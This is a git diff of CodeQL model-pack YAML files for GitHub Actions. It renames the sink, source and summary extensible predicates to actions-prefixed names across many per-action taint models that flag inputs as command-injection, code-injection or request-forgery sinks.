@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d..aa849603836 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588b..ae869b6b531 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0..9f5801b79c0 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] 
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8e..a4a473b8efd 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a..10a03e4d186 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d..9af82b985f3 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5..3b779d0b86d 100644 
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fc..6ad087730e4 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde96..fa9c1958352 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc914..6bfaffb2bba 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72..03fa8beaf0b 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 8b2b4e79afa..a4ccaac2d2e 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf6855..7c32705dde5 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db7..902483f4399 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80d..be86a330b97 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b..0a6f7c34722 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] 
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627..613b3e0fc59 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af2..489d47ac71e 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1..4a98ecd4af1 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c9988..57dc40ef6b8 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] 
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5..3b92f667ae9 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da658..da8b02312ea 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fd..c06d13301d2 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a..61935c36f7d 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814..89f61cedc42 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec..1aabfc23fc4 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbb..d55fdbc3ea9 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] 
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92f..d01ac86d317 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e2..bab76cbe27f 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec5..02ac5032c79 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b..0c484d44549 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2..c088c7a644e 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b..5b22ac1f5fe 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02..3329a255e6f 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] 
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c67..14a1cdeed86 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1c..49931d93f88 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0af..37d0014bcbb 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a18103868..9058c9fb984 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml 
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c..713c5c61cea 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e..40b02283152 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd..c08505f9747 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f2..6305fd33960 100644 
--- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0b..73988096818 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf5..ee9a0dbb32a 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a..f056cf5d864 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] 
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f..838f0b30848 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253..c215755f61d 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f515..014e779b29a 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc6884389..806c055529d 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb..d6e554a8709 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff6..55d1531a770 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f18215..c52d62e204a 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede..1e915194d96 100644 
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222..1cc360c472d 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git 